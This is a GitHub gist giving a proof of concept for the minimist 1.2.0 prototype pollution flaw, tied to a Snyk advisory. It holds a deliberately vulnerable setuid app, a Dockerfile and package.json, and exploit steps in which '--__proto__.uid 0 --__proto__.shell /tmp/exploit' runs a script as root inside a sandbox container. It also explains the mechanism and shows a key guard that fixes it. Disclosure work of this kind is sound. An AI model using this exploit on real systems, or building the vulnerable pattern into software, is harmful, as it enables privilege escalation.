@Kirill89
Last active March 6, 2023 10:27
Prototype Pollution security vulnerability in minimist

https://snyk.io/vuln/SNYK-JS-MINIMIST-559764

How to run:

  1. npm i
  2. npm run build
  3. npm run start

Definition

Now you are in a sandbox with the permissions of just-user. Our goal is to create test.txt at the root of the container, which we certainly do not have permission to do.

To validate this, try the following:

echo "test" > /test.txt
bash: /test.txt: Permission denied

Exploit

  1. Create exploit script: printf '#!/bin/sh\necho "test" > /test.txt' > /tmp/exploit
  2. Give it execute permission: chmod +x /tmp/exploit
  3. Run the application: ./app --__proto__.uid 0 --__proto__.shell /tmp/exploit

To validate run cat /test.txt.

As you can see, we have a permission violation via the vulnerable application: the setuid binary ran our script as uid 0.
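The mechanism behind step 3, as an added example that is not code from the gist: a toy re-implementation of the dotted-key assignment that minimist 1.2.0 performs for "--a.b value" shows that --__proto__.uid 0 lands on Object.prototype, so a fresh empty options object (like the one execSync builds when none is passed) inherits uid and shell; the isDangerous guard (an assumed name) is the fix approach of refusing such keys, and setKey, parseArgs and inheritedAfterParse are also assumed names.

```javascript
// Assign `value` at the nested path `keys` inside `obj`, creating objects on the
// way. Unguarded, the key "__proto__" walks straight into Object.prototype.
function setKey(obj, keys, value, guard) {
  let o = obj;
  for (const key of keys.slice(0, -1)) {
    if (guard && guard(key)) return;         // hardened path: refuse to descend
    if (o[key] === undefined) o[key] = {};
    o = o[key];
  }
  const last = keys[keys.length - 1];
  if (guard && guard(last)) return;          // hardened path: refuse to assign
  o[last] = value;
}

// Minimal "--name value" parser; a numeric-looking value becomes a Number, as minimist does.
function parseArgs(args, guard) {
  const argv = {};
  for (let i = 0; i < args.length; i++) {
    if (!args[i].startsWith('--')) continue;
    const name = args[i].slice(2);
    let value = true;
    if (i + 1 < args.length && !args[i + 1].startsWith('--')) {
      value = args[++i];
      if (/^-?\d+(\.\d+)?$/.test(value)) value = Number(value);
    }
    setKey(argv, name.split('.'), value, guard);
  }
  return argv;
}

// Guard for the hardened parse (hypothetical name): keys that reach
// Object.prototype or a constructor must never be walked or assigned.
const isDangerous = (k) => k === '__proto__' || k === 'constructor' || k === 'prototype';

// The gist's command line reduced to its two flags (constructed input).
const attack = ['--__proto__.uid', '0', '--__proto__.shell', '/tmp/exploit'];

// Parse `args`, then report what a brand-new empty object (like the options object
// execSync builds when none is passed) inherits; undoes the pollution afterwards.
function inheritedAfterParse(args, guard) {
  parseArgs(args, guard);
  const opts = {};
  const inherited = { uid: opts.uid, shell: opts.shell };
  delete Object.prototype.uid;
  delete Object.prototype.shell;
  return inherited;
}

console.log('unguarded:', inheritedAfterParse(attack));              // { uid: 0, shell: '/tmp/exploit' }
console.log('guarded:  ', inheritedAfterParse(attack, isDangerous)); // { uid: undefined, shell: undefined }
```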

app.js:

const argv = require('minimist')(process.argv.slice(2)); // minimist 1.2.0: "--__proto__.x y" writes x onto Object.prototype
const cp = require('child_process');
if (argv.help) {
  console.log("This app has no options - just show list of files in root");
} else {
  // No options object is passed, so the options execSync builds internally inherit
  // any polluted uid/shell from Object.prototype; the binary runs setuid root.
  console.log(String(cp.execSync('ls /')));
}
Dockerfile:

FROM ubuntu:18.04
COPY ./app /app
# setuid root: the packaged app runs with root privileges whoever starts it
RUN chmod u+s /app
# unprivileged user the sandbox shell runs as
RUN useradd -s /bin/bash just-user
USER just-user
package.json:

{
  "name": "poc",
  "version": "1.0.0",
  "description": "",
  "main": "index.js",
  "keywords": [],
  "author": "",
  "license": "ISC",
  "scripts": {
    "start": "docker run --rm -it poc bash",
    "build": "npm run build:cli && npm run build:docker",
    "build:cli": "pkg app.js --target node10-linux-x64",
    "build:docker": "docker build . --tag poc"
  },
  "dependencies": {
    "minimist": "1.2.0"
  },
  "devDependencies": {
    "pkg": "4.4.4"
  }
}
Imebeez commented Mar 6, 2023

Nice